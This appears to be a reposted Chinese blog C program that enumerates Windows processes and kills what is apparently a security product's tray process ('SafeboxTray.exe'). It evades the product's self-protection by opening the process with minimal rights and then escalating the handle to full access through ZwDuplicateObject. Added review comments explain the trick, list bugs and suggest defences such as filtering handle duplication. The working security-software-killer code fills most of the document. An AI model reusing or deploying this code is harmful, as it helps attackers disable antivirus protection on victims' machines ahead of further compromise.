转载自骁骑营的伙夫BLOG
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
/*
 * Function-pointer type used to call ntdll's ZwDuplicateObject, which kill()
 * resolves at run time with GetProcAddress.
 *
 * NOTE(review): this hand-written declaration differs from the WDK prototype
 * of ZwDuplicateObject/NtDuplicateObject, which returns NTSTATUS, takes
 * SourceHandle as a HANDLE (not a PHANDLE) and takes a ULONG HandleAttributes
 * where this one has BOOLEAN InheritHandle. The call site in kill() casts the
 * handle value to PHANDLE to fit this declaration. Confirm against the WDK
 * headers before reusing the type.
 */
typedef DWORD (_stdcall *_ZwDuplicateObject)(
IN HANDLE SourceProcessHandle,
IN PHANDLE SourceHandle,
IN HANDLE TargetProcessHandle,
OUT PHANDLE TargetHandle,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN BOOLEAN InheritHandle,
IN ULONG Options
);
/* Forward declaration: main() calls kill() before its definition appears. */
int kill(DWORD pid);
/*
 * Enumerate running processes through a Toolhelp snapshot, print each image
 * name, and pass the first entry whose name matches the hard-coded literal
 * to kill(); enumeration stops after that first match.
 *
 * Returns -1 if the snapshot cannot be created, 0 otherwise (whether or not
 * a matching process was found).
 *
 * NOTE(review): szExeFile is printed with "%s" and compared with strncmp, so
 * this assumes an ANSI (non-UNICODE) build -- confirm the build settings.
 * The return value of kill() is not inspected.
 *
 * Defender's view: the observable sequence is a full process-list walk
 * followed by a handle being opened on one specific process. SafeboxTray.exe
 * is presumably the tray component of a security product (not stated on the
 * page -- confirm), so a process that enumerates and then opens it is worth
 * alerting on.
 */
int main()
{
    PROCESSENTRY32 entry;
    HANDLE snapshot;
    BOOL have_entry;

    /* The Toolhelp API requires dwSize to be set before the first query. */
    entry.dwSize = sizeof(entry);

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        printf("CreateToolhelp32Snapshot调用失败!");
        return -1;
    }

    have_entry = Process32First(snapshot, &entry);
    printf("%20s\t%10s\n", "进程名", "PID");
    printf("====================================\n");

    for (; have_entry; have_entry = Process32Next(snapshot, &entry)) {
        printf("%s\n", entry.szExeFile);

        /* Compare including the terminating NUL (sizeof of the literal). */
        if (strncmp("safeboxTray.exe", entry.szExeFile, sizeof("SafeboxTray.exe")) != 0) {
            continue;
        }

        printf("Find SafeboxTray, begining to kill it...\n");
        kill(entry.th32ProcessID);
        break;
    }

    CloseHandle(snapshot);
    printf("====================================\n");
    return 0;
}
/*
 * kill - attempt to terminate the process identified by pid.
 *
 * Sequence, as written:
 *   1. Open the target with access mask 0x400 (PROCESS_QUERY_INFORMATION).
 *   2. Call ntdll's ZwDuplicateObject on that handle, with the current
 *      process as both source and target ((HANDLE)-1), requesting
 *      0x1F0FFF (PROCESS_ALL_ACCESS in pre-Vista SDKs) and Options = 1
 *      (DUPLICATE_CLOSE_SOURCE). The result overwrites hl.
 *   3. Call TerminateProcess on hl.
 *
 * Always prints "Kill Over." and returns 1; no call's result is reported.
 *
 * NOTE(review), correctness:
 *   - hNtdll and proc are not checked for NULL before proc is called.
 *   - The status returned by proc is discarded, so the code cannot tell
 *     whether the wider access mask was actually granted.
 *   - TerminateProcess runs even when OpenProcess returned NULL, and its
 *     result is ignored, so "Kill Over." says nothing about success.
 *   - hl is never closed with CloseHandle.
 *
 * NOTE(review), defender's view: the terminate right is never requested at
 * OpenProcess time; it is requested when the handle is duplicated. Self-
 * protection or monitoring that inspects only the access mask of process-open
 * calls sees just the 0x400 request. Coverage needs to include handle
 * duplication as well, e.g. a kernel ObRegisterCallbacks pre-operation
 * callback that also filters OB_OPERATION_HANDLE_DUPLICATE for the protected
 * process, and auditing of handle operations on security-product processes.
 */
int kill(DWORD pid)
{
HMODULE hNtdll;
HANDLE hl;
_ZwDuplicateObject proc;
// Look up the already-loaded ntdll.dll; the result is not checked.
hNtdll = GetModuleHandle("ntdll.dll");
// Resolve the native export by name; proc is not checked for NULL.
proc = (void*)GetProcAddress(hNtdll,"ZwDuplicateObject");
// 0x400 = PROCESS_QUERY_INFORMATION; handle is not inheritable.
hl = OpenProcess(0x400,0,pid);
if(hl != NULL)
{
// (HANDLE)-1 is the current-process pseudo handle for source and target.
// The handle value is cast to PHANDLE only to satisfy the local typedef.
// 0x1F0FFF is the requested access, 0 = not inheritable,
// 1 = DUPLICATE_CLOSE_SOURCE. The new handle is written back into hl.
proc((HANDLE)-1,(PHANDLE)hl,(HANDLE)-1,&hl,0x1F0FFF,0, 1);
}
// Reached on every path, including hl == NULL; result is ignored.
TerminateProcess(hl, 0);
printf("Kill Over.\n");
return 1;
}